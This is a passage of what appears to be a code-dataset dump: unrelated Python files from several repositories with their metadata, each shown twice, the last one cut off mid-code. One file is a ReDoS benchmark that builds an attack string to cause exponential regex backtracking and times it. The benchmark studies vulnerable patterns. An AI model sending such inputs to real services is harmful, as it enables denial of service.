class Migration(migrations.Migration):
    # Auto-generated schema migration for the tutorial's polls app:
    # re-declares Choice.votes so that new rows default to 0.
    # Kept in its generated form, as is conventional for migrations.
    dependencies = [
        ('polls', '0001_initial'),
    ]
    operations = [
        # AlterField keeps the integer column type and adds default=0.
        migrations.AlterField(
            model_name='choice',
            name='votes',
            field=models.IntegerField(default=0),
        ),
    ]
| true | true |
f71013d279ee02e1a4eef74c167f62131c79ae29 | 1,991 | py | Python | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | evosoro_pymoo/Algorithms/RankAndNoveltySurvival.py | leguiart/MSc_Thesis | 22ffc73c75d814856850f26c4586d90896b74cf3 | [
"MIT"
] | null | null | null | import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
# ---------------------------------------------------------------------------------------------------------
# Survival Selection
# ---------------------------------------------------------------------------------------------------------
class RankAndNoveltySurvival(Survival):
    """NSGA-II style survival where the crowding distance is replaced by
    an unaligned-novelty metric: within the splitting front, the most
    novel individuals survive."""

    def __init__(self, nds=None) -> None:
        super().__init__(filter_infeasible=True)
        # Fall back to the default non-dominated sorting implementation.
        self.nds = NonDominatedSorting() if nds is None else nds

    def _do(self, problem, pop, *args, n_survive=None, **kwargs):
        # Objective-space values of the whole population.
        objectives = pop.get("F").astype(float, copy=False)

        # Non-dominated sorting, stopping once n_survive are ranked.
        fronts = self.nds.do(objectives, n_stop_if_ranked=n_survive)

        survivors = []
        for rank, front in enumerate(fronts):
            front_novelty = get_unaligned_novelty(pop[front])

            # Record rank and the novelty-based "crowding" value on each
            # individual (stored under the key pymoo expects).
            for offset, idx in enumerate(front):
                pop[idx].set("rank", rank)
                pop[idx].set("crowding", front_novelty[offset])

            remaining = n_survive - len(survivors)
            if len(front) > remaining:
                # Splitting front: keep only the most novel individuals.
                order = randomized_argsort(front_novelty, order='descending',
                    method='numpy')
                chosen = order[:remaining]
            else:
                # The whole front fits; take it unsorted.
                chosen = np.arange(len(front))
            survivors.extend(front[chosen])

        return pop[survivors]
def get_unaligned_novelty(pop):
    """Gather each individual's unaligned-novelty metric into a numpy array."""
    metrics = [individual.X.unaligned_novelty_metric for individual in pop]
    return np.array(metrics)
| 35.553571 | 107 | 0.57559 | import numpy as np
from pymoo.core.survival import Survival
from pymoo.util.nds.non_dominated_sorting import NonDominatedSorting
from pymoo.util.randomized_argsort import randomized_argsort
class RankAndNoveltySurvival(Survival):
    """NSGA-II style survival where the crowding distance is replaced by
    an unaligned-novelty metric: within the splitting front, the most
    novel individuals survive."""

    def __init__(self, nds=None) -> None:
        super().__init__(filter_infeasible=True)
        # Fall back to the default non-dominated sorting implementation.
        self.nds = NonDominatedSorting() if nds is None else nds

    def _do(self, problem, pop, *args, n_survive=None, **kwargs):
        # Objective-space values of the whole population.
        objectives = pop.get("F").astype(float, copy=False)

        # Non-dominated sorting, stopping once n_survive are ranked.
        fronts = self.nds.do(objectives, n_stop_if_ranked=n_survive)

        survivors = []
        for rank, front in enumerate(fronts):
            front_novelty = get_unaligned_novelty(pop[front])

            # Record rank and the novelty-based "crowding" value on each
            # individual (stored under the key pymoo expects).
            for offset, idx in enumerate(front):
                pop[idx].set("rank", rank)
                pop[idx].set("crowding", front_novelty[offset])

            remaining = n_survive - len(survivors)
            if len(front) > remaining:
                # Splitting front: keep only the most novel individuals.
                order = randomized_argsort(front_novelty, order='descending',
                    method='numpy')
                chosen = order[:remaining]
            else:
                # The whole front fits; take it unsorted.
                chosen = np.arange(len(front))
            survivors.extend(front[chosen])

        return pop[survivors]
def get_unaligned_novelty(pop):
    """Gather each individual's unaligned-novelty metric into a numpy array."""
    metrics = [individual.X.unaligned_novelty_metric for individual in pop]
    return np.array(metrics)
| true | true |
f7101568fd06e7609738fb50b7989e279bd9adf1 | 321 | py | Python | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 1,743 | 2015-03-30T20:56:03.000Z | 2022-03-31T09:08:37.000Z | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 1,159 | 2015-04-01T08:25:53.000Z | 2022-03-29T08:15:31.000Z | tests/resources/functional/test_all.py | IamSaurabh1/taurus | 928d44e30e6cd5b979e675bfdce4c1dbeb5d0eff | [
"Apache-2.0"
] | 497 | 2015-03-31T21:05:18.000Z | 2022-03-17T12:45:21.000Z | from unittest import TestCase, skipIf
class TestAll(TestCase):
    """Fixture suite with one deliberate outcome of each kind
    (pass, error, failure, skip) for exercising result reporting."""

    def test_passing(self):
        pass

    def test_erroring(self):
        raise Exception("Ima broke")

    def test_failing(self):
        # Intentionally wrong (2 + 2 * 2 == 6): this test must always fail.
        # assertEquals is a deprecated alias removed in Python 3.12;
        # assertEqual behaves identically.
        self.assertEqual(2 + 2 * 2, 8)

    @skipIf(2 > 1, "Skip everytime")
    def test_skipped(self):
        pass
| 18.882353 | 39 | 0.623053 | from unittest import TestCase, skipIf
class TestAll(TestCase):
    """Fixture suite with one deliberate outcome of each kind
    (pass, error, failure, skip) for exercising result reporting."""

    def test_passing(self):
        pass

    def test_erroring(self):
        raise Exception("Ima broke")

    def test_failing(self):
        # Intentionally wrong (2 + 2 * 2 == 6): this test must always fail.
        # assertEquals is a deprecated alias removed in Python 3.12;
        # assertEqual behaves identically.
        self.assertEqual(2 + 2 * 2, 8)

    @skipIf(2 > 1, "Skip everytime")
    def test_skipped(self):
        pass
| true | true |
f71015ada55db9be78eab80611c4bfe815bfe940 | 512 | py | Python | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | 1 | 2022-01-24T14:43:23.000Z | 2022-01-24T14:43:23.000Z | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | regexlib/2021-5-15/python_re_test_file/regexlib_6851.py | yetingli/ReDoS-Benchmarks | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | [
"MIT"
] | null | null | null | # 6851
# ^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$
# EXPONENT
# nums:4
# EXPONENT AttackString:"a"+"0"*32+"!1 __NQ"
import re
from time import perf_counter

# ReDoS benchmark: the nested quantifiers in this pattern backtrack
# exponentially on inputs that almost match but fail at the very end.
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    # Attack input: a growing run of matchable characters followed by a
    # suffix ("!1 __NQ") that can never satisfy the anchored pattern.
    ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
    BEGIN = perf_counter()
    # Time a single search; the match object is irrelevant, so the unused
    # bindings from the original (m, LEN) have been dropped.
    REGEX.search(ATTACK)
    DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | 26.947368 | 60 | 0.568359 |
import re
from time import perf_counter

# ReDoS benchmark: the nested quantifiers in this pattern backtrack
# exponentially on inputs that almost match but fail at the very end.
regex = """^[a-zA-Z0-9]+(([_][a-zA-Z0-9])?[a-zA-Z0-9]*)*$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    # Attack input: a growing run of matchable characters followed by a
    # suffix ("!1 __NQ") that can never satisfy the anchored pattern.
    ATTACK = "a" + "0" * i * 1 + "!1 __NQ"
    BEGIN = perf_counter()
    # Time a single search; the match object is irrelevant, so the unused
    # bindings from the original (m, LEN) have been dropped.
    REGEX.search(ATTACK)
    DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | true | true |
f71016e8f4f652bd02e3c9822c374573d6ee503c | 844 | py | Python | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 3 | 2021-12-15T04:58:18.000Z | 2022-02-06T12:15:37.000Z | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | null | null | null | Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/lms/djangoapps/discussion/management/commands/create_roles_for_existing.py | osoco/better-ways-of-thinking-about-software | 83e70d23c873509e22362a09a10d3510e10f6992 | [
"MIT"
] | 1 | 2019-01-02T14:38:50.000Z | 2019-01-02T14:38:50.000Z | """
This must be run only after seed_permissions_roles.py!
Creates default roles for all users currently in the database. Just runs through
Enrollments.
"""
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand):
    """Assign the default forum role for every active course enrollment.

    Must be run only after seed_permissions_roles.py has created the roles.
    """
    # Docstring added, so the pylint missing-class-docstring suppression
    # is no longer needed. Typo 'permisssions' fixed in the help text.
    help = 'Seed default permissions and roles.'

    def handle(self, *args, **options):
        print('Updated roles for ', end=' ')
        # Walk every active enrollment, assign its user the default role,
        # and print a progress marker every 1000 enrollments.
        for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
            assign_default_role_on_enrollment(None, enrollment)
            if i % 1000 == 0:
                print(f'{i}...', end=' ')
        print()
| 33.76 | 98 | 0.716825 |
from django.core.management.base import BaseCommand
from common.djangoapps.student.models import CourseEnrollment
from openedx.core.djangoapps.django_comment_common.models import assign_default_role_on_enrollment
class Command(BaseCommand):
    """Assign the default forum role for every active course enrollment.

    Must be run only after seed_permissions_roles.py has created the roles.
    """
    # Typo 'permisssions' fixed in the help text.
    help = 'Seed default permissions and roles.'

    def handle(self, *args, **options):
        print('Updated roles for ', end=' ')
        # Walk every active enrollment, assign its user the default role,
        # and print a progress marker every 1000 enrollments.
        for i, enrollment in enumerate(CourseEnrollment.objects.filter(is_active=1), start=1):
            assign_default_role_on_enrollment(None, enrollment)
            if i % 1000 == 0:
                print(f'{i}...', end=' ')
        print()
| true | true |
f71017b7f644057a8140806f89c03842a4395186 | 1,962 | py | Python | notebooks/imgaug-playground.py | robertklee/SENG474-DataMining | 1996e263fb9a84d62ceab2b2402cbbcaf7a1e2d7 | [
"MIT"
] | 14 | 2021-03-09T06:38:39.000Z | 2022-03-11T16:21:46.000Z | notebooks/imgaug-playground.py | axjing/PoseEstimate | 85b6ff300e18320fe8b40c89d5f22fde51ba588e | [
"MIT"
] | 23 | 2021-03-07T20:50:50.000Z | 2022-01-17T04:01:08.000Z | notebooks/imgaug-playground.py | axjing/PoseEstimate | 85b6ff300e18320fe8b40c89d5f22fde51ba588e | [
"MIT"
] | 9 | 2021-04-13T16:21:44.000Z | 2022-02-23T06:08:30.000Z | import imgaug as ia
from imgaug import augmenters as iaa
import numpy as np
from scipy import misc
import imageio
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)

# Demo 1: keypoint augmentation on the sample quokka image.
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
    Keypoint(x=65, y=100),
    Keypoint(x=75, y=200),
    Keypoint(x=100, y=100),
    Keypoint(x=200, y=80)
], shape=image.shape)

seq = iaa.Sequential([
    # Brightness change leaves keypoint coordinates untouched.
    iaa.Multiply((1.2, 1.5)),
    # Rotation by exactly 10 degrees and scaling to 50-70% move the keypoints.
    iaa.Affine(
        rotate=10,
        scale=(0.5, 0.7)
    )
])

# Augment image and keypoints together so they stay consistent.
image_aug, kps_aug = seq(image=image, keypoints=kps)

# Report each keypoint before and after the augmentation
# (use .x_int / .y_int for rounded integer coordinates).
for i, (before, after) in enumerate(zip(kps.keypoints, kps_aug.keypoints)):
    print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
        i, before.x, before.y, after.x, after.y)
    )

# Render the keypoints onto the image before/after augmentation.
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
    """Demo 2: bounding-box augmentation on a blank white image."""
    imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
    bbs = ia.BoundingBoxesOnImage([
        ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
    ], shape=imgs.shape[1:])

    # Crop, pad with grey, then shrink to 50% with black fill; a single
    # deterministic instance transforms images and boxes identically.
    aug = iaa.Sequential([
        iaa.Crop(px=10),
        iaa.Pad(px=10, pad_cval=128),
        iaa.Affine(scale=0.5, cval=0)
    ])
    aug_det = aug.to_deterministic()
    imgs_aug = aug_det.augment_images(imgs)
    bbs_aug = aug_det.augment_bounding_boxes([bbs])

    print("bbs:")
    for box in bbs_aug[0].bounding_boxes:
        print(box)

    # NOTE(review): 'orig' receives the 4-D batch array rather than
    # imgs[0]; presumably imgs[0] was intended — confirm with cv2.
    cv2.imshow('orig',imgs)
    cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
    cv2.waitKey()
if __name__ == "__main__":
main() | 27.25 | 75 | 0.667686 | import imgaug as ia
from imgaug import augmenters as iaa
import numpy as np
from scipy import misc
import imageio
import cv2
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables import Keypoint, KeypointsOnImage
ia.seed(1)

# Demo 1: keypoint augmentation on the sample quokka image.
image = ia.quokka(size=(256, 256))
kps = KeypointsOnImage([
    Keypoint(x=65, y=100),
    Keypoint(x=75, y=200),
    Keypoint(x=100, y=100),
    Keypoint(x=200, y=80)
], shape=image.shape)

seq = iaa.Sequential([
    # Brightness change leaves keypoint coordinates untouched.
    iaa.Multiply((1.2, 1.5)),
    # Rotation by exactly 10 degrees and scaling to 50-70% move the keypoints.
    iaa.Affine(
        rotate=10,
        scale=(0.5, 0.7)
    )
])

# Augment image and keypoints together so they stay consistent.
image_aug, kps_aug = seq(image=image, keypoints=kps)

# Report each keypoint before and after the augmentation
# (use .x_int / .y_int for rounded integer coordinates).
for i, (before, after) in enumerate(zip(kps.keypoints, kps_aug.keypoints)):
    print("Keypoint %d: (%.8f, %.8f) -> (%.8f, %.8f)" % (
        i, before.x, before.y, after.x, after.y)
    )

# Render the keypoints onto the image before/after augmentation.
image_before = kps.draw_on_image(image, size=7)
image_after = kps_aug.draw_on_image(image_aug, size=7)
def main():
    """Demo 2: bounding-box augmentation on a blank white image."""
    imgs = np.zeros((1, 100, 100, 3), dtype=np.uint8) + 255
    bbs = ia.BoundingBoxesOnImage([
        ia.BoundingBox(x1=0, x2=50, y1=0, y2=50)
    ], shape=imgs.shape[1:])

    # Crop, pad with grey, then shrink to 50% with black fill; a single
    # deterministic instance transforms images and boxes identically.
    aug = iaa.Sequential([
        iaa.Crop(px=10),
        iaa.Pad(px=10, pad_cval=128),
        iaa.Affine(scale=0.5, cval=0)
    ])
    aug_det = aug.to_deterministic()
    imgs_aug = aug_det.augment_images(imgs)
    bbs_aug = aug_det.augment_bounding_boxes([bbs])

    print("bbs:")
    for box in bbs_aug[0].bounding_boxes:
        print(box)

    # NOTE(review): 'orig' receives the 4-D batch array rather than
    # imgs[0]; presumably imgs[0] was intended — confirm with cv2.
    cv2.imshow('orig',imgs)
    cv2.imshow('aug',bbs_aug[0].draw_on_image(imgs_aug[0]))
    cv2.waitKey()
if __name__ == "__main__":
main() | true | true |
f71018380534b07b785f0c1841cc61cff5c72b7b | 2,407 | py | Python | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
] | 3 | 2021-06-22T19:57:41.000Z | 2021-06-23T07:16:44.000Z | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
] | 26 | 2020-03-14T19:27:37.000Z | 2022-03-30T21:45:17.000Z | rllib/env/wrappers/tests/test_moab_wrapper.py | BonsaiAI/ray | 941d30f082fe879ea30618af14327c25b5a21a74 | [
"Apache-2.0"
] | 2 | 2021-05-05T21:05:16.000Z | 2021-06-22T21:16:03.000Z | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
                         [
                             ("MoabMoveToCenterSim-v0", 10),
                             ("MoabMoveToCenterPartialObservableSim-v0", 10),
                             ("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
                         )
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
    """Smoke tests for the Moab gym wrappers registered with Ray Tune."""

    @pytest.fixture
    def env_name(self) -> str:
        return "MoabMoveToCenterSim-v0"

    @pytest.fixture
    def randomize_ball(self) -> bool:
        return False

    @pytest.fixture
    def randomize_obstacle(self) -> bool:
        return False

    @pytest.fixture
    def seed(self) -> Optional[int]:
        return None

    @pytest.fixture
    def iterations(self) -> int:
        return 3

    @pytest.fixture
    def moab_env(self,
                 env_name: str,
                 randomize_ball: bool,
                 randomize_obstacle: bool,
                 seed: Optional[int]) -> _MoabBaseWrapper:
        """Instantiate the registered environment with the given config."""
        env_creator = _global_registry.get(ENV_CREATOR, env_name)
        env_config = {
            "randomize_ball": randomize_ball,
            "randomize_obstacle": randomize_obstacle,
            "seed": seed,
        }
        return env_creator(env_config)

    def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
        obs = moab_env.reset()
        # Fixed: the original wrote `assert (cond, msg)`, which asserts a
        # non-empty tuple and therefore always passed.
        assert moab_env.observation_space.contains(obs), \
            f"{moab_env.observation_space} doesn't contain {obs}"
        new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
        assert moab_env.observation_space.contains(new_obs)

    def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
        assert isinstance(moab_env.action_space, gym.spaces.Box)
        moab_env.reset()
        action = moab_env.action_space.sample()
        moab_env.step(action)

    def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
        moab_env.reset()
        for _ in range(iterations):
            moab_env.step(moab_env.action_space.sample())
| 33.901408 | 88 | 0.633153 | from typing import Optional
import gym
import pytest
from ray.rllib.env.wrappers.moab_wrapper import _MoabBaseWrapper
from ray.tune.registry import ENV_CREATOR, _global_registry
@pytest.mark.parametrize("env_name, iterations",
                         [
                             ("MoabMoveToCenterSim-v0", 10),
                             ("MoabMoveToCenterPartialObservableSim-v0", 10),
                             ("MoabMoveToCenterAvoidObstacleSim-v0", 3),],
                         )
@pytest.mark.parametrize("randomize_ball", [True, False])
@pytest.mark.parametrize("randomize_obstacle", [True, False])
@pytest.mark.parametrize("seed", [None, 1])
class TestMoabWrapper:
    """Smoke tests for the Moab gym wrappers registered with Ray Tune."""

    @pytest.fixture
    def env_name(self) -> str:
        return "MoabMoveToCenterSim-v0"

    @pytest.fixture
    def randomize_ball(self) -> bool:
        return False

    @pytest.fixture
    def randomize_obstacle(self) -> bool:
        return False

    @pytest.fixture
    def seed(self) -> Optional[int]:
        return None

    @pytest.fixture
    def iterations(self) -> int:
        return 3

    @pytest.fixture
    def moab_env(self,
                 env_name: str,
                 randomize_ball: bool,
                 randomize_obstacle: bool,
                 seed: Optional[int]) -> _MoabBaseWrapper:
        """Instantiate the registered environment with the given config."""
        env_creator = _global_registry.get(ENV_CREATOR, env_name)
        env_config = {
            "randomize_ball": randomize_ball,
            "randomize_obstacle": randomize_obstacle,
            "seed": seed,
        }
        return env_creator(env_config)

    def test_observation_space(self, moab_env: _MoabBaseWrapper, iterations: int):
        obs = moab_env.reset()
        # Fixed: the original wrote `assert (cond, msg)`, which asserts a
        # non-empty tuple and therefore always passed.
        assert moab_env.observation_space.contains(obs), \
            f"{moab_env.observation_space} doesn't contain {obs}"
        new_obs, _, _, _ = moab_env.step(moab_env.action_space.sample())
        assert moab_env.observation_space.contains(new_obs)

    def test_action_space_conversion(self, moab_env: _MoabBaseWrapper, iterations: int):
        assert isinstance(moab_env.action_space, gym.spaces.Box)
        moab_env.reset()
        action = moab_env.action_space.sample()
        moab_env.step(action)

    def test_few_iterations(self, moab_env: _MoabBaseWrapper, iterations: int):
        moab_env.reset()
        for _ in range(iterations):
            moab_env.step(moab_env.action_space.sample())
| true | true |
f7101a37da6bdc31a3c3985e7b25b86ddef44ed1 | 29,931 | py | Python | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 12 | 2020-01-08T01:33:02.000Z | 2022-03-16T00:25:34.000Z | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 8 | 2019-12-19T19:34:56.000Z | 2022-03-10T10:11:28.000Z | code/pyto/tomo/ctf.py | anmartinezs/pyseg_system | 5bb07c7901062452a34b73f376057cabc15a13c3 | [
"Apache-2.0"
] | 2 | 2022-03-30T13:12:22.000Z | 2022-03-30T18:12:10.000Z | """
Functions related to ctf.
Currently only few that allow running ctffind from console or notebook.
Work in progress.
# Author: Vladan Lucic (Max Planck Institute for Biochemistry)
# $Id$
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from builtins import zip
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
from past.builtins import basestring
__version__ = "$Revision$"
import os
import subprocess
import logging
import numpy as np
import matplotlib.pyplot as plt
import pyto.util.nested
from pyto.io.image_io import ImageIO
from pyto.grey.image import Image
class Ctf(object):
"""
Determination of CTF by external tools
"""
# prefix for validation attributed obtained from gctf
validation_prefix = "validation_"
# default params ctffind 4.0.17, also 4.1
default_params_ctffind = {
"pixel_a":1, "cs":2.7, "amp":0.1, "phase":"no", 'box':512,
'min_res':30, 'max_res':5, 'min_def':5000, 'max_def':50000,
'def_step':500, 'astig':100, 'known_astig':'no', 'slow_search':'yes',
'restraint_astig':'yes', 'tolerated_astig':200,
'phase':'yes', 'min_phase':0, 'max_phase':2, 'phase_step':0.1,
'expert':'no'}
# parameter list for ctffind 4.0.17 (currently not used, left for reference)
param_names_ctffind_4_0 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step']
# default parameter list for 4.1; consistent with default_params_ctffind
param_names_ctffind_4_1 = [
'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'known_astig', 'slow_search',
'restraint_astig','tolerated_astig',
'phase', 'min_phase', 'max_phase', 'phase_step', 'expert']
def __init__(self):
"""
Initializes common attributes
"""
# attributes
self.image_path_orig = []
self.image_inds = []
self.image_path = []
self.ctf_path = []
self.phases = []
self.defoci_1 = []
self.defoci_2 = []
self.defoci = []
self.resolution = []
self.pixel_a = []
self.angle = []
@classmethod
def find(
cls, image_dir, image_prefix, ctf_dir, params, pixel_a=None,
flatten='auto', tool='ctffind', executable=None,
param_file='ctf_params.txt', fast=False, max_images=None,
plot_ctf=True, plot_ps=True, b_plot=True, exp_f_plot=False,
show_legend=True, plot_phases=True, plot_defoci=True,
plot_resolution=True, print_results=True, print_validation=False):
"""
Determines and shows CTF fits for multiple images.
All files located in (arg) image_dir whose namess start with (arg)
image_prefix and that have extension mrc, em or st are selected
for the ctf determination.
If a selected file is 3D (image stack), and arg flatten is True or
'auto', all z-slices are summed up (saved in ctf_dir) and the ctf
is detemined on the resulting (flattened. Alternatively, if arg
flatten is False, z-slices are extracted, saved in ctf_dir and
analyzed separately.
All resulting files, as well as the extraced or flattened images
(in case of 3D files) are saved or moved to directory ctf_dir.
CTF is determined using external tools. Current options are:
- CTFFIND
- gCTF
These tools have to be installed externally.
Parameters for the ctf tools are specified as a dictionary (arg params).
Parameters used for both ctffind and gctf are:
- 'pixel_a', 'voltage', 'cs', 'amp', 'box', 'min_res', 'max_res',
'min_def', 'max_def', 'def_step', 'astig', 'phase',
'min_phase', 'max_phase', 'phase_step'
Voltage ('voltage') should always be specified. The pixel size
(pixel_a) has to be specified in case it can not be read from
the image header. All other parameters are optional, if they are
not specified the ctffind / gctg default values are used.
The default values should be fine for single particle images.
Parameter recommendations for phase plate images are given in
the ctffind / gctf documentation.
In case of ctffind, arg params can also be a list containing the
parameter values in the same order as specified above, starting
with voltage.
Important for ctffind: Because the required arguments differ between
versions 4.0 and 4.1, as well as depend on values specified, it is
not guaranteed that the dictionary form of arg params will work.
In case of problems, specify params as a list.
In addition, all other gctf arguments can also be specified
(without '--'). It is suggested to use:
'do_EPA':'', 'do_validation':''
Parameter units are the same as in the ctf deterimantion tools.
Intended for use in an environment such as Jupyter notebook.
Arguments:
- image_dir: directory where images reside
- image prefix: beginning of image file(s)
- ctf_dir: directory where the ctf determination results and
extracted images are saved
- pixel_a: pixel size in A
- params: ctf determination parameters
- flatten: indicated whether 3D images should be flatten (True or
'auto') or not (False).
- tool: name of the ctf detmination tool
- executable: ctf tool executable
- param_file: name of the temporary parameter file
- fast: flag indicating whether ctffind --fast option is used
- print_results: flag indicating if phase and defoci found
are printed for each analyzed image
- plot_ctf: flag indicating whether ctf is plotted for each
analyzed image
- show_legend: flag indicating whether a legend is shown on ctf graphs
- plot_phases, plot_defoci: flags indicating whether a graph
containing phases and defoci of all images respectivelly are plotted
- max_images: max number if image analyzed, for testing
Returns an instance of this class. The following attributes are all
lists where elements correspond to individual images:
- image_path_orig: image path of the input file
- image_path: image path of the image that is actually used
to deterime ctf. It differs from image_path_orig if the original
(input) image is a stack that is flattened or used to extract slices
- image_inds: index of a slice extracted for a stack
- ctf_path: path of the ctf fit image
- defocus_1, defocus_2, defocus: defoci along the two axes and the
mean defocus in um
- angle: defocus (astigmatism) angle
- phase: phase shift in multiples of pi
- resolution: resolution in nm
- ccc: correlation coefficient
- pixel_a: pixel size in A
- b_factor: b-factor (gctf only)
"""
# initialize
index = 0
new = cls()
print_head = True
if plot_ctf and fast:
print(
"Warning: CTF will not be plotted because fast execution"
+ " was chosen")
# check which ctf tool to use
if tool == 'ctffind':
if executable is None:
executable = 'ctffind'
elif tool == 'gctf':
if executable is None:
executable = 'gctf'
else:
raise ValueError(
"CTF determination tool " + str(tool) + " was not understood.")
new.tool = tool
# cftfind on all images
file_list = np.sort(os.listdir(image_dir))
for image_name in file_list:
# skip files that are not images
if not image_name.startswith(image_prefix): continue
if not (image_name.endswith('.mrc') or image_name.endswith('.st')
or image_name.endswith('.em')):
continue
if image_name.endswith('ctf.mrc'): continue
# set input image path
image_path = os.path.join(image_dir, image_name)
# figure out if to flatten or not (just once, assume all files
# are the same)
im_io = ImageIO(file=image_path)
if image_name.endswith('.st'):
im_io.readHeader(fileFormat='mrc')
else:
im_io.readHeader()
z_dim = im_io.shape[2]
n_digits = int(np.ceil(np.log10(z_dim)))
if isinstance(flatten, bool):
pass
elif isinstance(flatten, basestring) and (flatten == 'auto'):
if z_dim > 1:
flatten = True
else:
flatten = False
else:
raise ValueError(
"Argument flatten: "+ str(flatten) +" was not understood.")
# load stack and prepare image name, if need to extract images
if (z_dim > 1) and not flatten:
image_dir, image_name = os.path.split(image_path)
image_base, image_extension = image_name.rsplit('.', 1)
image_name_new_tmplt = (
image_base + '_%0' + str(n_digits) + 'd.mrc')
if image_name.endswith('.st'):
stack = Image.read(
image_path, memmap=True, fileFormat='mrc')
else:
stack = Image.read(image_path, memmap=True)
else:
image_path_to_read = image_path
# find ctf of the current image or stack
for image_in_stack_ind in range(z_dim):
# extract and save images if needed
if (z_dim > 1) and not flatten:
if not os.path.exists(ctf_dir): os.makedirs(ctf_dir)
image_path_to_read = os.path.join(
ctf_dir, (image_name_new_tmplt % image_in_stack_ind))
one_image = Image()
one_image.data = stack.data[:,:,image_in_stack_ind]
one_image.write(
file=image_path_to_read, pixel=stack.pixelsize)
# save image path retlated
new.image_path_orig.append(image_path)
new.image_inds.append(image_in_stack_ind)
new.image_path.append(image_path_to_read)
# find ctf
if tool == 'ctffind':
# ctffind
res_one = cls.ctffind(
image_path=image_path_to_read, flatten=flatten,
ctf_dir=ctf_dir, executable=executable,
pixel_a=pixel_a, params=params,
param_file=param_file, fast=fast, print_head=print_head,
print_results= print_results,
plot_ctf=plot_ctf, show_legend=show_legend)
elif tool == 'gctf':
# gctf
res_one = cls.gctf(
image_path=image_path_to_read, params=params,
pixel_a=pixel_a, flatten=flatten, ctf_dir=ctf_dir,
executable=executable,
plot_ctf=plot_ctf, plot_ps=plot_ps ,b_plot=b_plot,
exp_f_plot=exp_f_plot, show_legend=show_legend,
print_results=print_results,
print_head=print_head,
print_validation=print_validation)
# save gctf specific data
try:
new.b_factor.append(res_one['b_factor'])
except AttributeError:
new.b_factor = [res_one['b_factor']]
for name, value in list(res_one.items()):
if name.startswith(cls.validation_prefix):
try:
previous_val = getattr(new, name)
previous_val.append(value)
setattr(new, name, previous_val)
except AttributeError:
setattr(new, name, [value])
else:
